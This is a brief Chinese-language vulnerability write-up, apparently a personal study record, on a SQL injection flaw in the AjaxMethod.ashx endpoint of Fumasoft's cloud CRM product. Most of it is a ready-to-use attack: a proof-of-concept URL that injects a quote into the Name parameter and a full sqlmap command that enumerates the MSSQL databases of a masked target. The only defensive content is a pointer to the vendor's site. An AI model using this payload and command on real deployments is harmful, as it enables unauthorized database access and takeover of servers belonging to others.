漏洞描述:
孚盟云 AjaxMethod.ashx文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器权限。
漏洞利用条件:
/
漏洞影响范围:
/
漏洞复现:
1.登录页面
2.poc:/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27
3.Sqlmap语句:sqlmap -u "http://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y" -p Name --batch --random-agent --dbms mssql --dbs
修复建议:
请关注厂商主页更新:https://www.fumasoft.com
学习记录过程,仅供参考!!!
